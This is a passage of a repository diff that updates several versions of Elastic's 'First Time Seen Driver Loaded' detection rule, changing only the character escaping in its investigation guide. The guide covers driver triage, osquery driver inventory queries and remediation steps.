Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n", "references": [ "https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks" @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_4.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_4.json index 1a927a91c7f..fdddc0a3e7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_4.json +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_4.json @@ -16,7 +16,7 @@ "dll.pe.original_file_name", "dll.code_signature.subject_name" ], - "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n", "references": [ "https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks" @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_5.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_5.json index 15252562ec1..1b38937f276 100644 --- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_5.json +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_5.json @@ -16,7 +16,7 @@ "dll.pe.original_file_name", "dll.code_signature.subject_name" ], - "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n", "references": [ "https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks" @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_6.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_6.json index cecc97a677d..6038316db9c 100644 --- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_6.json +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_6.json @@ -16,7 +16,7 @@ "dll.pe.original_file_name", "dll.code_signature.subject_name" ], - "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and 